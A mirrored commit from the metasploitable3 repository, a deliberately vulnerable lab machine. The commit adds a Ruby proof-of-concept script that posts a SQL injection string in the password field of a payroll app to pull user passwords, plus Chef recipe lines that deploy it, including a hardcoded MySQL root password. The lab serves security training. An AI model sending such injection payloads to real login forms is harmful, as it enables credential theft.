mirror of
https://github.com/rapid7/metasploitable3.git
synced 2024-06-30 16:55:50 +02:00
Add poc for sql injection.
This commit is contained in:
parent
dc8ffbcec6
commit
bc8fb88017
|
@ -38,6 +38,7 @@ if($_POST['s']){
|
|||
foreach ($keys as $key) {
|
||||
echo "<td>" . $row[$key] . "</td>";
|
||||
}
|
||||
echo "</tr>\n";
|
||||
}
|
||||
$result->free();
|
||||
}
|
||||
|
|
14
chef/cookbooks/metasploitable/files/payroll_app/poc.rb
Normal file
14
chef/cookbooks/metasploitable/files/payroll_app/poc.rb
Normal file
|
@ -0,0 +1,14 @@
|
|||
require 'net/http'
|
||||
|
||||
url = "http://127.0.0.1/payroll_app.php"
|
||||
uri = URI(url)
|
||||
user = 'luke_skywalker'
|
||||
injection = "password'; select password from users where username='' OR ''='"
|
||||
|
||||
puts "Making POST request to #{uri} with the following parameters:"
|
||||
puts "'user' = #{user}"
|
||||
puts "'password' = #{injection}"
|
||||
res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
|
||||
|
||||
puts "Response body is #{res.body}"
|
||||
puts "Done"
|
|
@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
|
|||
mode '0755'
|
||||
end
|
||||
|
||||
directory '/home/vagrant/poc/payroll_app/' do
|
||||
mode '0755'
|
||||
owner 'vagrant'
|
||||
recursive true
|
||||
end
|
||||
|
||||
cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
|
||||
source 'payroll_app/poc.rb'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
bash 'create payroll database and import data' do
|
||||
code <<-EOH
|
||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
|
||||
|
|
Loading…
Reference in New Issue
Block a user